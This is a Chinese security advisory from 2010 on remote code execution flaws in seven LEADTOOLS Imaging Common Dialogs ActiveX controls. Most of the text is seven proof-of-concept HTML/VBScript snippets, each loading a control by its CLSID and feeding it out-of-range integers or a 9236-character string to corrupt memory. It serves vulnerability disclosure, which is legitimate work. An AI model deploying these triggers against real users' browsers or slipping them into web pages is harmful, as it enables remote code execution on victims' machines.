安全研究
安全漏洞
LEADTOOLS Imaging Common Dialogs多个ActiveX控件远程代码执行漏洞
发布日期:2010-09-01
更新日期:2010-09-02
受影响系统:
LeadTools Imaging Common Dialogs 16.5.0.2描述:
LEADTOOLS Imaging Common Dialogs可为图形处理、转换和效果等提供专业级的成像公共对话框。
Imaging Common Dialogs所提供的LtocxWebDlgu.dll、LtocxEfxDlgu.dll、LtocxImgDlgu.dll、LtocxImgEfxDlgu.dll、LtocxImgDocDlgu.dll、LtocxClrDlgu.dll、LtocxFileDlgu.dll ActiveX控件没有正确地过滤输入参数,用户受骗访问了恶意网页并传送了超长参数就可能导致执行任意代码。
<*来源:Gjoko Krstic (liquidworm@gmail.com)
链接:http://www.exploit-db.com/exploits/14852/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
------------------------------------------------------
<object classid='clsid:00165B53-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxWebDlgu.dll"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LTRASTERDLGWEBLib_U.LEADRasterDlgWeb_U"
argCount = 1
arg1=-1
target.Bitmap = arg1
</script>
2. (Effects, LtocxEfxDlgu.dll / LTRDEU.DLL):
------------------------------------------------------
<object classid='clsid:00165B5B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxEfxDlgu.dll"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LTRASTERDLGEFXLib_U.LEADRasterDlgEfx_U"
argCount = 1
arg1=-1
target.Bitmap = arg1
</script>
3. (Image, LtocxImgDlgu.dll / LTRDMU.DLL):
------------------------------------------------------
<object classid='clsid:00165C7B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxImgDlgu.dll"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LTRASTERDLGIMGLib_U.LEADRasterDlgImg_U"
argCount = 1
arg1=2147483647
target.Bitmap = arg1
</script>
4. (Image Effects, LtocxImgEfxDlgu.dll / LTRDXU.DLL):
------------------------------------------------------
<object classid='clsid:00165B57-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxImgEfxDlgu.dll"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LTRASTERDLGIMGEFXLib_U.LEADRasterDlgImgEfx_U"
argCount = 1
arg1=-2147483647
target.Bitmap = arg1
</script>
5. (Image Document, LtocxImgDocDlgu.dll / LTRDOU.DLL):
------------------------------------------------------
<object classid='clsid:00165B69-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxImgDocDlgu.dll"
prototype = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid = "LTRASTERDLGIMGDOCLib_U.LEADRasterDlgImgDoc_U"
argCount = 1
arg1=2147483647
target.Bitmap = arg1
</script>
6. (Color, LtocxClrDlgu.dll / LTRDRU.DLL):
------------------------------------------------------
<object classid='clsid:00165B4F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\LEAD Technologies\LEADTOOLS Active-X 16.5\Bin\CDLL\Win32\LtocxClrDlgu.dll"
prototype = "Property Let UserPalette ( ByVal iIndex As Integer ) As Long"
memberName = "UserPalette"
progid = "LTRASTERDLGCLRLib_U.LEADRasterDlgClr_U"
argCount = 2
arg1=1
arg2=-2147483647
target.UserPalette(arg1 ) = arg2
</script>
7. (File, LtocxFileDlgu.dll / LTRDFU.DLL):
------------------------------------------------------
<object classid='clsid:00165C87-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxFileDlgu.dll"
prototype = "Property Let DestinationPath As String"
memberName = "DestinationPath"
progid = "LTRASTERDLGFILELib_U.LEADRasterDlgFile_U"
argCount = 1
arg1=String(9236, "A")
target.DestinationPath = arg1
</script>
建议:
厂商补丁:
LeadTools
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.leadtools.com/SDK/Raster/Raster-Addon-JPEG2000.htm
浏览次数:3357
严重程度:0(网友投票)
绿盟科技给您安全的保障